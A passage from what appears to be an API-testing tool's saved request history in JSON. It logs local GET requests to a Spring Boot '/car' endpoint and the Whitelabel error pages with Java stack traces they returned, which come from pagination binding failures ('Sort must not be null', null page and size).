org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:197)\\r\\n\\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)\\r\\n\\tat org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)\\r\\n\\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:135)\\r\\n\\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)\\r\\n\\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)\\r\\n\\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:360)\\r\\n\\tat org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:399)\\r\\n\\tat org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)\\r\\n\\tat org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:893)\\r\\n\\tat org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1789)\\r\\n\\tat org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)\\r\\n\\tat org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\\r\\n\\tat java.lang.Thread.run(Thread.java:748)\\r\\nCaused by: java.lang.IllegalArgumentException: Sort must not be null\\r\\n\\tat org.springframework.util.Assert.notNull(Assert.java:201)\\r\\n\\tat org.springframework.data.domain.PageRequest.\\u0026lt;init\\u0026gt;(PageRequest.java:47)\\r\\n\\tat sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)\\r\\n\\tat sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)\\r\\n\\tat sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)\\r\\n\\tat java.lang.reflect.Constructor.newInstance(Constructor.java:423)\\r\\n\\tat org.springframework.beans.BeanUtils.instantiateClass(BeanUtils.java:211)\\r\\n\\t... 51 more\\r\\n\\u003c/div\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":16.0,\"minute\":16.0,\"second\":20.0,\"nano\":2.688072E8}}},{\"url\":\"http://localhost:8080/car\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"key\":\"id\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Integer\",\"value\":\"1\"},{\"is_checked\":1.0,\"key\":\"carId\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":1.0,\"key\":\"sort.orders\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Array\",\"value\":\"\"},{\"is_checked\":1.0,\"key\":\"sort.orders.direction\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.Direction\",\"value\":\"ASC\"},{\"is_checked\":1.0,\"key\":\"sort.orders.property\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"String\",\"value\":\"\"},{\"is_checked\":1.0,\"key\":\"sort.orders.ignoreCase\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"boolean\",\"value\":\"false\"},{\"is_checked\":1.0,\"key\":\"sort.orders.nullHandling\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"org.springframework.data.domain.Sort.NullHandling\",\"value\":\"NATIVE\"},{\"is_checked\":1.0,\"key\":\"page\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":1.0,\"key\":\"size\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"int\",\"value\":\"1\"},{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8080/car?sort.orders.nullHandling\\u003dNATIVE\\u0026sort.orders\\u003d\\u0026sort.orders.direction\\u003dASC\\u0026size\\u003d1\\u0026id\\u003d1\\u0026page\\u003d1\\u0026sort.orders.property\\u003d\\u0026sort.orders.ignoreCase\\u003dfalse\\u0026carId\\u003d\\n\\n\\u003chtml\\u003e\\u003cbody\\u003e\\u003ch1\\u003eWhitelabel Error Page\\u003c/h1\\u003e\\u003cp\\u003eThis application has no explicit mapping for /error, so you are seeing this as a fallback.\\u003c/p\\u003e\\u003cdiv id\\u003d\\u0027created\\u0027\\u003eMon Jun 24 16:27:49 CST 2024\\u003c/div\\u003e\\u003cdiv\\u003eThere was an unexpected error (type\\u003dInternal Server Error, status\\u003d500).\\u003c/div\\u003e\\u003cdiv\\u003eFailed to instantiate [org.springframework.data.domain.PageRequest]: Constructor threw exception; nested exception is java.lang.IllegalArgumentException: Sort must not be null\\u003c/div\\u003e\\u003cdiv style\\u003d\\u0027white-space:pre-wrap;\\u0027\\u003eorg.springframework.beans.BeanInstantiationException: Failed to instantiate [org.springframework.data.domain.PageRequest]: Constructor threw exception; nested exception is java.lang.IllegalArgumentException: Sort must not be null\\r\\n\\tat org.springframework.beans.BeanUtils.instantiateClass(BeanUtils.java:224)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.constructAttribute(ModelAttributeMethodProcessor.java:332)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.createAttribute(ModelAttributeMethodProcessor.java:220)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletModelAttributeMethodProcessor.createAttribute(ServletModelAttributeMethodProcessor.java:85)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.resolveArgument(ModelAttributeMethodProcessor.java:147)\\r\\n\\tat org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:122)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:179)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:146)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:117)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:895)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:808)\\r\\n\\tat org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1071)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:964)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1006)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:898)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:670)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:883)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:779)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:197)\\r\\n\\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)\\r\\n\\tat org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)\\r\\n\\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:135)\\r\\n\\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)\\r\\n\\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)\\r\\n\\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:360)\\r\\n\\tat org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:399)\\r\\n\\tat org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)\\r\\n\\tat org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:893)\\r\\n\\tat org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1789)\\r\\n\\tat org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)\\r\\n\\tat org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\\r\\n\\tat java.lang.Thread.run(Thread.java:748)\\r\\nCaused by: java.lang.IllegalArgumentException: Sort must not be null\\r\\n\\tat org.springframework.util.Assert.notNull(Assert.java:201)\\r\\n\\tat org.springframework.data.domain.PageRequest.\\u0026lt;init\\u0026gt;(PageRequest.java:47)\\r\\n\\tat sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)\\r\\n\\tat sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)\\r\\n\\tat sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)\\r\\n\\tat java.lang.reflect.Constructor.newInstance(Constructor.java:423)\\r\\n\\tat org.springframework.beans.BeanUtils.instantiateClass(BeanUtils.java:211)\\r\\n\\t... 51 more\\r\\n\\u003c/div\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":16.0,\"minute\":27.0,\"second\":49.0,\"nano\":9.036719E8}}},{\"url\":\"http://localhost:8080/car\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"key\":\"id\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Integer\",\"value\":\"1\"},{\"is_checked\":0.0,\"key\":\"\",\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8080/car?id\\u003d1\\n\\n\\u003chtml\\u003e\\u003cbody\\u003e\\u003ch1\\u003eWhitelabel Error Page\\u003c/h1\\u003e\\u003cp\\u003eThis application has no explicit mapping for /error, so you are seeing this as a fallback.\\u003c/p\\u003e\\u003cdiv id\\u003d\\u0027created\\u0027\\u003eMon Jun 24 16:28:28 CST 2024\\u003c/div\\u003e\\u003cdiv\\u003eThere was an unexpected error (type\\u003dBad Request, status\\u003d400).\\u003c/div\\u003e\\u003cdiv\\u003eValidation failed for object\\u003d\\u0026#39;pageRequest\\u0026#39;. Error count: 2\\u003c/div\\u003e\\u003cdiv style\\u003d\\u0027white-space:pre-wrap;\\u0027\\u003eorg.springframework.validation.BindException: org.springframework.validation.BeanPropertyBindingResult: 2 errors\\nField error in object \\u0026#39;pageRequest\\u0026#39; on field \\u0026#39;page\\u0026#39;: rejected value [null]; codes [typeMismatch.pageRequest.page,typeMismatch.page,typeMismatch.int,typeMismatch]; arguments [org.springframework.context.support.DefaultMessageSourceResolvable: codes [pageRequest.page,page]; arguments []; default message [page]]; default message [Failed to convert value of type \\u0026#39;null\\u0026#39; to required type \\u0026#39;int\\u0026#39;; nested exception is org.springframework.core.convert.ConversionFailedException: Failed to convert from type [null] to type [int] for value \\u0026#39;null\\u0026#39;; nested exception is java.lang.IllegalArgumentException: A null value cannot be assigned to a primitive type]\\nField error in object \\u0026#39;pageRequest\\u0026#39; on field \\u0026#39;size\\u0026#39;: rejected value [null]; codes [typeMismatch.pageRequest.size,typeMismatch.size,typeMismatch.int,typeMismatch]; arguments [org.springframework.context.support.DefaultMessageSourceResolvable: codes [pageRequest.size,size]; arguments []; default message [size]]; default message [Failed to convert value of type \\u0026#39;null\\u0026#39; to required type \\u0026#39;int\\u0026#39;; nested exception is org.springframework.core.convert.ConversionFailedException: Failed to convert from type [null] to type [int] for value \\u0026#39;null\\u0026#39;; nested exception is java.lang.IllegalArgumentException: A null value cannot be assigned to a primitive type]\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.constructAttribute(ModelAttributeMethodProcessor.java:329)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.createAttribute(ModelAttributeMethodProcessor.java:220)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletModelAttributeMethodProcessor.createAttribute(ServletModelAttributeMethodProcessor.java:85)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.resolveArgument(ModelAttributeMethodProcessor.java:147)\\r\\n\\tat org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:122)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:179)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:146)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:117)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:895)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:808)\\r\\n\\tat org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1071)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:964)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1006)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:898)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:670)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:883)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:779)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:197)\\r\\n\\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)\\r\\n\\tat org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)\\r\\n\\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:135)\\r\\n\\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)\\r\\n\\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)\\r\\n\\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:360)\\r\\n\\tat org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:399)\\r\\n\\tat org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)\\r\\n\\tat org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:893)\\r\\n\\tat org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1789)\\r\\n\\tat org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)\\r\\n\\tat org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\\r\\n\\tat java.lang.Thread.run(Thread.java:748)\\r\\n\\u003c/div\\u003e\\u003c/body\\u003e\\u003c/html\\u003e\",\"selectedItem\":\"GET\",\"time\":{\"date\":{\"year\":2024.0,\"month\":6.0,\"day\":24.0},\"time\":{\"hour\":16.0,\"minute\":28.0,\"second\":28.0,\"nano\":2.62417E7}}},{\"url\":\"http://localhost:8080/car\",\"header\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"query\":[{\"is_checked\":1.0,\"key\":\"id\",\"type\":\"Text\",\"not_null\":\"1\",\"field_type\":\"Integer\",\"value\":\"1\"},{\"is_checked\":0.0,\"key\":\"\",\"type\":\"Text\",\"value\":\"\"}],\"rest\":[{\"is_checked\":1.0,\"type\":\"Text\",\"value\":\"\"}],\"requestBody\":\"\",\"responseBody\":\"There was an error accessing to URL: http://localhost:8080/car?id\\u003d1\\n\\n\\u003chtml\\u003e\\u003cbody\\u003e\\u003ch1\\u003eWhitelabel Error Page\\u003c/h1\\u003e\\u003cp\\u003eThis application has no explicit mapping for /error, so you are seeing this as a fallback.\\u003c/p\\u003e\\u003cdiv id\\u003d\\u0027created\\u0027\\u003eMon Jun 24 16:28:36 CST 2024\\u003c/div\\u003e\\u003cdiv\\u003eThere was an unexpected error (type\\u003dBad Request, status\\u003d400).\\u003c/div\\u003e\\u003cdiv\\u003eValidation failed for object\\u003d\\u0026#39;pageRequest\\u0026#39;. Error count: 2\\u003c/div\\u003e\\u003cdiv style\\u003d\\u0027white-space:pre-wrap;\\u0027\\u003eorg.springframework.validation.BindException: org.springframework.validation.BeanPropertyBindingResult: 2 errors\\nField error in object \\u0026#39;pageRequest\\u0026#39; on field \\u0026#39;page\\u0026#39;: rejected value [null]; codes [typeMismatch.pageRequest.page,typeMismatch.page,typeMismatch.int,typeMismatch]; arguments [org.springframework.context.support.DefaultMessageSourceResolvable: codes [pageRequest.page,page]; arguments []; default message [page]]; default message [Failed to convert value of type \\u0026#39;null\\u0026#39; to required type \\u0026#39;int\\u0026#39;; nested exception is org.springframework.core.convert.ConversionFailedException: Failed to convert from type [null] to type [int] for value \\u0026#39;null\\u0026#39;; nested exception is java.lang.IllegalArgumentException: A null value cannot be assigned to a primitive type]\\nField error in object \\u0026#39;pageRequest\\u0026#39; on field \\u0026#39;size\\u0026#39;: rejected value [null]; codes [typeMismatch.pageRequest.size,typeMismatch.size,typeMismatch.int,typeMismatch]; arguments [org.springframework.context.support.DefaultMessageSourceResolvable: codes [pageRequest.size,size]; arguments []; default message [size]]; default message [Failed to convert value of type \\u0026#39;null\\u0026#39; to required type \\u0026#39;int\\u0026#39;; nested exception is org.springframework.core.convert.ConversionFailedException: Failed to convert from type [null] to type [int] for value \\u0026#39;null\\u0026#39;; nested exception is java.lang.IllegalArgumentException: A null value cannot be assigned to a primitive type]\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.constructAttribute(ModelAttributeMethodProcessor.java:329)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.createAttribute(ModelAttributeMethodProcessor.java:220)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletModelAttributeMethodProcessor.createAttribute(ServletModelAttributeMethodProcessor.java:85)\\r\\n\\tat org.springframework.web.method.annotation.ModelAttributeMethodProcessor.resolveArgument(ModelAttributeMethodProcessor.java:147)\\r\\n\\tat org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:122)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:179)\\r\\n\\tat org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:146)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:117)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:895)\\r\\n\\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:808)\\r\\n\\tat org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1071)\\r\\n\\tat org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:964)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1006)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:898)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:670)\\r\\n\\tat org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:883)\\r\\n\\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:779)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201)\\r\\n\\tat org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189)\\r\\n\\tat org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\\r\\n\\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:197)\\r\\n\\tat org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)\\r\\n\\tat org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541)\\r\\n\\tat org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:135)\\r\\n\\tat org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)\\r\\n\\tat org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)\\r\\n\\tat org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:360)\\r\\n\\tat org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:399)\\r\\n\\tat org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)\\r\\n\\tat org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:893)\\r\\n\\tat org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1789)\\r\\n\\tat org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191)\\r\\n\\tat org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)\\r\\n\\tat org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\\r\\n\\tat 